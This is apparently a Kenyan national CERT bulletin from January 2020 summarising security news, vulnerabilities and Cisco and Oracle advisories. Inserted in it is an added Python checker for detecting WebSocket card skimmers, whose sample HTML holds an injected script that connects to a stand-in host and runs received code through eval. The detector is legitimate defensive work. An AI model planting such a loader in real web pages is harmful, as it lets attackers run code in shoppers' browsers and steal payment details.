NATIONAL KE-CIRT/CC CYBERSECURITY UPDATES - 6th January 2020 - National KE ...
Summary: Impact Metric Against Count of Events

Headlines               Critical  High  Medium  Informative
Regional Highlights     0         0     0       1
Top Stories             0         0     0       2
System vulnerabilities  0         2     0       2
Malware                 0         3     0       0
DDoS/Botnets            0         1     0       0
Spam & phishing         0         2     0       0
Web Security            0         2     0       0
Updates & alerts        1         3     2       0

Regional Highlights

Source 1: Standard Digital ( https://www.standardmedia.co.ke/ )
https://www.standardmedia.co.ke/business/article/2001355350/google-denies-xiaomi-access-over-security-bug
Impact value: Informative
Google bars Chinese firm Xiaomi over security bug. Google has revoked a Chinese tech giant’s access rights after a user was able to view the feed from a stranger’s security cameras on his device.

Top Stories

Source 1: The Washington Post ( https://www.washingtonpost.com/ )
https://www.washingtonpost.com/technology/2020/01/03/cyber-attack-should-be-expected-us-strike-iranian-leader-sparks-fears-major-digital-disruption/
Impact value: Informative
‘A cyberattack should be expected’: U.S. strike on Iranian leader sparks fears of major digital disruption. The US government fears a new wave of cyberattacks from Iran in retaliation for the airstrike that killed Maj. Gen. Qassim Suleimani at the Baghdad airport in Iraq.

Source 2: Yahoo News ( https://sg.news.yahoo.com/ )
https://sg.news.yahoo.com/chinese-scientists-develop-portable-quantum-144357951.html
Impact value: Informative
Portable quantum satellite communication device. Chinese scientists have developed a quantum satellite ground station that is not only capable of sending ultra-secure messages anywhere in the world but also fits inside a family car.

System Vulnerabilities

Source 1: Health IT Security ( https://healthitsecurity.com/ )
https://healthitsecurity.com/news/new-mexico-hospital-finds-malware-infection-on-digital-imaging-server
Impact value: High
New Mexico Hospital Finds Malware Infection on Digital Imaging Server. The healthcare data of 500 patients of Roosevelt General Hospital was exposed due to a malware infection. The potentially compromised data included patients’ names, contact information, Social Security numbers, dates of birth, driver’s licenses, medical data, gender, and health insurance details. Upon discovery, officials removed the malware and rebuilt the server, recovering all impacted patient data.

Source 2: Tech Crunch ( https://techcrunch.com/ )
https://techcrunch.com/2020/01/02/travelex-malware/
Impact value: High
Travelex suspends services after malware attack. London-based currency exchange Travelex has been forced to go offline and suspend some services following a malware attack launched on New Year’s Eve. It is not known what form of malware has impacted the firm. The incident has also affected some of its clients, such as Tesco Bank.

Source 3: Security Affairs ( https://securityaffairs.co/ )
https://securityaffairs.co/wordpress/95913/hacking/d-link-routers-flaws.html
Impact value: Informative
Remote Command Execution and Information disclosure flaws affect dozens of D-Link routers. Experts have disclosed exploits for remote command execution and information disclosure vulnerabilities affecting many D-Link routers. The RCE flaw is tracked as CVE-2019-17621 and resides in the code used to manage UPnP requests. The vulnerability could be exploited by an unauthenticated attacker to take control of vulnerable devices. D-Link has issued firmware updates to address the vulnerabilities.

Source 4: Talos Intelligence ( https://blog.talosintelligence.com/ )
https://blog.talosintelligence.com/2020/01/opencv-buffer-overflow-jan-2020.html
Impact value: Informative
Vulnerability Spotlight: Two buffer overflow vulnerabilities in OpenCV. Two buffer overflow vulnerabilities have been discovered in the OpenCV libraries. An attacker could potentially exploit these bugs to cause heap corruption and potentially code execution. A patch to address these issues has been released by OpenCV.

Malware

Source 1: Security Affairs ( https://securityaffairs.co/ )
https://securityaffairs.co/wordpress/96017/malware/sodinokibi-ransomware-attack.html
Impact value: High
California IT service provider Synoptek pays ransom after Sodinokibi attack. Synoptek, a California-based IT service provider, decided to pay the ransom to decrypt its files after being infected with the Sodinokibi ransomware.

Source 2: Fortinet ( https://www.fortinet.com/ )
https://www.fortinet.com/blog/threat-research/death-ransom-new-strain-ransomware.html
Impact value: High
The Curious Case of DeathRansom: Part I. Extensive research has revealed that the DeathRansom ransomware is controlled by attackers associated with the spread of other malware families such as Vidar Stealer, AzoRult, Eviral, 1ms0rry, and Supreme miner. These attackers were found to use a Russian email service and the Russian domain zone “.ru”. The ransomware scans and encrypts files on local and network drives.

Source 3: Malwarebytes Labs ( https://blog.malwarebytes.com/ )
https://blog.malwarebytes.com/threat-analysis/2019/12/new-evasion-techniques-found-in-web-skimmers/
Impact value: High
New evasion techniques found in web skimmers. Cybercriminals have found new evasion techniques to prevent their web skimmers from being detected in online retail shops. These include the use of steganography and the WebSocket communication protocol, which makes it difficult for web crawlers and scanners to detect the malicious JavaScript code injected into the sites.

DDoS/Botnets

Source 1: CYWARE ( https://cyware.com/news/ )
https://cyware.com/news/bluehero-botnet-found-scanning-the-internet-to-infect-systems-with-xmrig-miner-and-gh0st-rat-cfc3d7d9
Impact value: High
BlueHero botnet found scanning the internet to infect systems with XMRig miner and Gh0st RAT. The BlueHero botnet derives its name from the domain bluehero[.]in found in its binary. The botnet leverages a variety of web exploits to intrude into unpatched web servers. It also contains several other exploits to spread across the network. To initiate the infection process, the botnet actively scans for IP addresses with ports 80 and 3389 open. It then uses Mimikatz to dump passwords from infected hosts into a Results.txt file.
Spam & Phishing

Source 1: CYWARE ( https://cyware.com/news/ )
https://cyware.com/news/cybercriminals-adopt-steganography-based-credit-card-skimmer-to-steal-payment-card-details-93b72efd
Impact value: High
Cybercriminals Adopt Steganography-based Credit Card Skimmer to Steal Payment Card Details. Threat actors are notably using WebSockets to provide a more covert way to exchange data than typical HTTP request-responses. When the malicious JavaScript code runs in the browser, it triggers a client handshake request. Once this is established, a series of bidirectional messages are exchanged between the victim’s browser and the malicious host. These messages also include the credit card skimming code.

https://cyware.com/news/scammers-made-nearly-405-million-from-military-personnel-and-veterans-since-2012-686eeee1
Impact value: High
Scammers Made Nearly $405 Million From Military Personnel and Veterans Since 2012. Nearly 1 million military personnel and veterans have been duped out of $405 million in different scams since 2012, according to a new report analyzed by the Federal Trade Commission (FTC) and the Better Business Bureau.
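As an added illustration (not from the bulletin or from either cited source), the following Python checker lists the WebSocket endpoints opened by a page's inline scripts and flags any host outside an assumed allowlist: a skimmer delivered over WebSocket, as described in the two items above, still has to open a connection to a host the shop never intended. The sample HTML, host names and allowlist are constructed.

```python
import re
from urllib.parse import urlparse

# Constructed sample page: one legitimate WebSocket feed, plus an injected
# script that opens a WebSocket to an unexpected host and executes whatever
# it receives. All host names here are hypothetical.
SAMPLE_HTML = """
<script>
  var feed = new WebSocket("wss://shop.example/live-stock");
</script>
<script>
  var s = new WebSocket('wss://cdn-stats.example.net/ws');
  s.onmessage = function (m) { eval(m.data); };
</script>
"""

# Hosts the shop is expected to open WebSockets to (assumed allowlist).
ALLOWED_WS_HOSTS = {"shop.example"}

# Matches new WebSocket("ws://...") or new WebSocket('wss://...').
WS_URL_RE = re.compile(r"""new\s+WebSocket\s*\(\s*(['"])(wss?://[^'"]+)\1""")
SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.S | re.I)
DYNAMIC_EXEC_RE = re.compile(r"\beval\s*\(|\bFunction\s*\(")


def find_websocket_endpoints(text):
    """Return every ws:// or wss:// URL passed to a WebSocket constructor."""
    return [m.group(2) for m in WS_URL_RE.finditer(text)]


def suspicious_websockets(html, allowed_hosts=ALLOWED_WS_HOSTS):
    """Flag WebSocket endpoints whose host is not on the allowlist.

    Each finding also records whether the same inline script executes
    received data dynamically, the pattern by which skimming code arrives
    over the socket in the incidents described above.
    """
    findings = []
    for script in SCRIPT_RE.findall(html):
        for url in find_websocket_endpoints(script):
            host = urlparse(url).hostname
            if host not in allowed_hosts:
                findings.append({
                    "url": url,
                    "host": host,
                    "executes_received_data": bool(DYNAMIC_EXEC_RE.search(script)),
                })
    return findings
```

Run the checker over a page capture as a lightweight site-integrity test; a new unknown WebSocket host in a payment page is worth an alert on its own, with or without the dynamic-execution signal.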
Web Security

Source 1: CNN ( https://edition.cnn.com/ )
https://edition.cnn.com/2020/01/04/politics/dhs-hack-website-trump-trnd/index.html
Impact value: High
DHS monitoring apparent hack of government library program website. A group of alleged Iranian hackers claims to have breached the website of a US government agency, the Federal Depository Library Program, on Saturday after the killing of Qasem Soleimani.

Source 2: Security Affairs ( https://securityaffairs.co/ )
https://securityaffairs.co/wordpress/95879/cyber-crime/star-wars-saga-cyber-attacks.html
Impact value: High
Crooks use Star Wars saga as bait in phishing and malware attacks. Crooks are exploiting the popularity of the Star Wars saga to lure users into downloading malware. To make this happen, cybercriminals have flooded social networks and the internet with rogue websites and files offering previews of the ‘The Rise of Skywalker’ movie and free streams. Kaspersky experts have discovered over 30 fake and infected streaming sites advertised on social networking pages.

Bulletins

Source 1: US-CERT - Security Bulletin Mailing List ( http://www.us-cert.gov/cas/bulletins/ )
https://www.us-cert.gov/ncas/bulletins/sb19-364
Vulnerability Summary for the Week of December 23, 2019. Recorded by the National Institute of Standards and Technology (NIST) National Vulnerability Database.

Source 2: Oracle Security Bulletins ( http://www.oracle.com/technetwork/topics/security/alerts-086861.html )
https://www.oracle.com/security-alerts/cpuoct2019.html
Oracle Critical Patch Update Advisory - October 2019; advised action: run available security updates.
https://www.oracle.com/security-alerts/alert-cve-2019-2729.html
Oracle Security Alert Advisory - CVE-2019-2729. Deserialization vulnerability in Oracle WebLogic Server, exploitable without authentication; advised action: run security updates.
https://www.oracle.com/security-alerts/bulletinoct2019.html
Oracle Solaris Third Party Bulletin - October 2019; advised action: apply necessary patches.
https://www.oracle.com/security-alerts/linuxbulletinoct2019.html
Oracle Linux Bulletin - October 2019; advised action: apply necessary Oracle Linux Bulletin fixes.
https://www.oracle.com/security-alerts/public-vuln-to-advisory-mapping.html
Map of CVE to Advisory/Alert; advised action: apply the Critical Patch Update for protection against known vulnerabilities.
https://www.oracle.com/security-alerts/ovmbulletinoct2019.html
Oracle VM Server for x86 Bulletin - October 2019; advised action: apply necessary Oracle VM Server for x86 Bulletin fixes.

Updates & Alerts

Source 1: Cisco Security Advisories & Alerts ( http://tools.cisco.com/security/center/publicationListing.x )
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-auth-bypass
Impact value: Critical
Cisco Data Center Network Manager Authentication Bypass Vulnerabilities. Due to multiple vulnerabilities in the authentication mechanisms of Cisco Data Center Network Manager (DCNM), a remote attacker could bypass authentication and execute arbitrary actions with administrative privileges on an affected device.

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-sql-inject
Impact value: High
Cisco Data Center Network Manager SQL Injection Vulnerabilities. Due to multiple vulnerabilities in the REST and SOAP API endpoints of Cisco Data Center Network Manager (DCNM), a remote attacker could execute arbitrary SQL commands on an affected device.

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-path-trav
Impact value: High
Cisco Data Center Network Manager Path Traversal Vulnerabilities. Due to multiple vulnerabilities in the REST and SOAP API endpoints and the Application Framework feature of Cisco Data Center Network Manager (DCNM), a remote attacker could conduct directory traversal attacks on an affected device.

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-comm-inject
Impact value: High
Cisco Data Center Network Manager Command Injection Vulnerabilities. Due to multiple vulnerabilities in the REST and SOAP API endpoints of Cisco Data Center Network Manager (DCNM), a remote attacker with administrative privileges on the DCNM application could inject arbitrary commands on the underlying operating system (OS).

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-xml-ext-entity
Impact value: Medium
Cisco Data Center Network Manager XML External Entity Read Access Vulnerability. Due to improper handling of XML External Entity (XXE) entries when parsing certain XML files in the SOAP API, a remote attacker could gain read access to information that is stored on an affected system.

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-unauth-access
Impact value: Medium
Cisco Data Center Network Manager JBoss EAP Unauthorized Access Vulnerability. Due to an incorrect configuration of the authentication settings on the JBoss Enterprise Application Platform (JBoss EAP), a remote attacker could gain unauthorized access to the JBoss EAP.

www.ke-cirt.go.ke